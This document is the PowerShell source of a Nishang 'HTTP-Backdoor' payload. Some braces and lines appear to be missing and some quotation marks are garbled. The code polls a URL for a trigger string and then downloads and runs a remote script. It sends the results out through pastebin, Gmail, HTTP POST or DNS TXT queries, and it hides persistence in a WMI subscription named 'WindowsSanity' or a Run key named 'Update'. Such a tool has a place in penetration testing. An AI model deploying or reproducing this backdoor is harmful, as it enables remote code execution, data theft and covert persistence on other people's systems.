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Nishang Payload which queries a URL for instructions and then downloads and executes a powershell script.
This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches
the string given in StopString variable.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
The URL which the payload would query for instructions.
The URL from where the powershell script would be downloaded.
.PARAMETER MagicString
The string which would act as an instruction to the payload to proceed with download and execute.
The string which if found at CheckURL will stop the payload.
.PARAMETER persist
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
Use this parameter to use exfiltration methods for returning the results.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
The URL of the webserver where POST requests would be sent.
The DomainName, whose subdomains would be used for sending TXT queries to.
Authoritative Name Server for the domain specified in DomainName
PS > HTTP-Backdoor
The payload will ask for all required options.
PS > HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
Use above when using the payload from non-interactive shells.
PS > HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis -exfil -ExfilOption DNS -DomainName example.com -AuthNS <dns>
Use above command for using exfiltration methods.
PS > HTTP-Backdoor -persist
Use above for reboot persistence.
function HTTP-Backdoor
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
$dev_key = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
$username = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
$password = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
$URL = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
$DomainName = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
$AuthNS = "null"
$body = @'
function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $MagicString, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
$exec = 0
start-sleep -seconds 5
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
if($filecontent -eq $MagicString)
$script:pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
if ($exfil -eq $True)
$pastename = $env:COMPUTERNAME + " Results of HTTP Backdoor: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
if ($exec -eq 1)
Start-Sleep -Seconds 60
elseif ($filecontent -eq $StopString)
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
function post_http($url,$parameters)
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
function Compress-Encode
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$Compressed = [Convert]::ToBase64String($ms.ToArray())
if ($exfiloption -eq "pastebin")
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
elseif ($exfiloption -eq "gmail")
$smtpserver = <20>smtp.gmail.com<6F>
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential(<28>$username<6D>, <20>$password<72>);
$msg.From = <20>$username@gmail.com<6F>
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
$att = new-object Net.Mail.Attachment($filename)
elseif ($exfiloption -eq "webserver")
$Data = Compress-Encode
post_http $URL $Data
elseif ($ExfilOption -eq "DNS")
$code = Compress-Encode
$lengthofsubstr = 0
$queries = [int]($code.Length/63)
while ($queries -ne 0)
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
$modulename = "HTTP-Backdoor.ps1"
if($persist -eq $True)
$name = "persist.vbs"
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"
if ($exfil -eq $True)
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString"
if ($exfil -eq $True)
$options = "HTTP-Backdoor-Logic $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
Invoke-Expression $env:TEMP\$modulename